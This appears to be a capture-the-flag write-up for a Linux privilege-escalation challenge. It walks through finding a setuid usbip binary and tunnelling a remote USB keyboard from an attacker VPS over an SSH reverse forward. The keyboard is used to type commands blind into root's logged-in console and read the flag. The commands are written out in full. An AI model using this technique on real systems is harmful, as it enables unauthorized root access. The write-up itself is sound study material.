Tags: misc net privesc usb 


Hi, a small write-up despite the lack of time to validate this chall.
The goal is to find a privilege escalation as root to get the flag in /flag.
I resume the recognition phase which is complicated with the timeout.

Search for suid binaries
find / -user root -perm -u=s 2>/dev/null
Usbip allows to share USB devices between computers with their full functionality, seems a good candidate...

Look at the active processes
ps -edf
root 1 0 14 21:19 ? 00:00:06 /sbin/init
root 2 0 0 21:19 ? 00:00:00 [kthreadd]
root 127 1 1 21:19 ttyS0 00:00:00 /bin/login -f
root 142 123 1 21:19 tty1 00:00:00 -bash
user 143 127 1 21:19 ttyS0 00:00:00 -bash
user 148 143 0 21:20 ttyS0 00:00:00 ps -edf
We notice that root is connected to tty1 and our is ttyS0.

We have all the necessary information, the idea is to connect a remote USB keyboard (with root suid rights) with usbip. Then, we must type the blind commands and redirect the output to our tty /dev/ttyS0.

Requierments :
* an additional keyboard
* a vps

Open an ssh remote forward tunnel from the default usbip port (3240) between your computer and your vps.
Make sure that the "GatewayPorts yes" option is enabled in the vps sshd_config.
ssh user@<vps-ip> -R 3240:localhost:3240

Install the usbip tools on your conputer
sudo apt install usbip

Start the necessary kernel modules on your computer and start uspipd
sudo modprobe usbip-host
sudo modprobe usbip-core
sudo usbipd -D

Now you have to plug the additional keyboard to your computer.

Find the bus id of the new keyboard
sudo usbip list -l # ex : 1-7

Bind the bus id on your computer (don't touch the new keybord or the link will be down)
sudo usbip --debug bind -b 1-7
usbip: debug: usbip.c:141:[run_command] running command: `bind'
usbip: info: bind device on busid 1-7: complete

On the chall, connect the remote keyboard and display the contents of /dev/ttyS0
/sbin/usbip attach -r <vps-ip> -b 1-7&
cat /dev/ttyS0

Now, you can blindly launch commands with the remote keyboard (beware of the timeout, you have to be fast ;) )
ls /flag > /dev/ttyS0
cat /flag/flag.txt > /dev/ttyS0